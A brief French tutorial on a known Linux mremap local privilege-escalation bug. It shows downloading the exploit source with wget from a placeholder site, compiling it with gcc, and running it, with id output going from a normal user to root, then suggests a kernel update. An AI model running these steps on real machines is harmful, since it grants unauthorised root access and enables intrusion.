Linux local root exploit avec mremap


Il s'agit d'une faille connue, celle-ci permet d'obtenir les droits administrateurs (root) depuis un compte utilisateur banal et ce à condition qu'elle soit vulnérable.

Avant toute chose, il faut veiller à posséder mremap, celui-ci étant disponible sur le net (une petite recherche pour mremap_pte.c est requise) il est possible de le télécharger grâce à l'outil wget :

$ wget \ (ouveture de wget)
> site_concerné.com/mremap_pte.c

C'est donc un fichier écrit en langage bas niveau C qui est téléchargé, une fois ceci effectué il ne reste plus qu'à le compiler à l'aide de GCC :
$ gcc mremap.c -o mremap
Si l'opération s'est déroulée sans problème, mremap est installé et prêt à l'emploi.


La suite consiste à l'utiliser dans le but de déceler la présence d'une faille éventuelle et ce en tant qu'utilisateur.
$ id
uid=1000(utilisateur) gid=1000(utilisateur)
./mremap

S'affiche alors deux points importants, à savoir vulnérable et exploitable, si la réponse est "YES", c'est mauvais signe. Il est alors possible de vérifier que le système prend désormais l'utilisateur pour l'administrateur :
$ id
uid=0(root) gid=0(root)
Cela se passe de commentaires...
La solution la plus simple est alors de mettre à jour le noyau.

Pour obtenir plus amples renseignements sur les exploits, vous pouvez vous rendre sur milw0rm.org.